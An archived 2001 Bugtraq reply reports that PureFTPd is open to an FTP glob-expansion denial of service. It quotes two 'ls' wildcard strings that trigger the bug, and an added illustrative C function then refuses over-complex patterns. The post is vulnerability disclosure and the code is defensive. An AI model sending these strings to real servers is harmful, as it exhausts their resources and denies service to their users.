Bugtraq mailing list archives

Re: Multiple vendors FTP denial of service


From: Jeff Dafoe <jeffd () EVCOM NET>
Date: Thu, 15 Mar 2001 14:54:17 -0500

- PureFTPd (any version) is not vulnerable. Result is "Simplified wildcard
expression to *" and the 'ls *' output.

        In an ironic twist, PureFTPd (of which you are apparently the author) is
indeed vulnerable to this globbing bug, using variants of the string you
previously posted.  Try:

ls .*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/

and

ls */.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/

        against your software.  To give you the same level of notice you gave
everyone else, I went ahead and posted this into your bug tracking system
about 30 seconds ago.


Jeff
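
A pattern-complexity check that a server could apply before expanding a client-supplied glob, as an added example that is not part of the original post and is not PureFTPd's code. The function name and both limits are assumptions chosen for illustration; the check works by capping how many path components may contain wildcards.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical limits, chosen for illustration only. */
#define MAX_WILD_COMPONENTS 3
#define MAX_PATTERN_LEN 256

/* Returns 1 if the pattern may be handed to the glob expander,
 * 0 if it should be refused. Each path component that contains a
 * wildcard forces another round of directory scans, so the check
 * counts such components rather than individual characters. */
int glob_pattern_allowed(const char *pattern)
{
    size_t len = strlen(pattern);
    int wild_components = 0;
    int counted = 0; /* current component already counted */

    if (len > MAX_PATTERN_LEN)
        return 0;

    for (size_t i = 0; i < len; i++) {
        char c = pattern[i];
        if (c == '/') {               /* new path component */
            counted = 0;
        } else if (c == '\\' && pattern[i + 1] != '\0') {
            i++;                      /* escaped char is a literal */
        } else if ((c == '*' || c == '?' || c == '[' || c == '{')
                   && !counted) {
            counted = 1;
            if (++wild_components > MAX_WILD_COMPONENTS)
                return 0;
        }
    }
    return 1;
}

int main(void)
{
    /* The first pattern is the one quoted in the post; the others
     * are constructed samples of ordinary requests. */
    const char *samples[] = {
        ".*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/",
        "*.txt",
        "pub/*/README",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-8s %s\n",
               glob_pattern_allowed(samples[i]) ? "allow" : "refuse",
               samples[i]);
    return 0;
}
```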

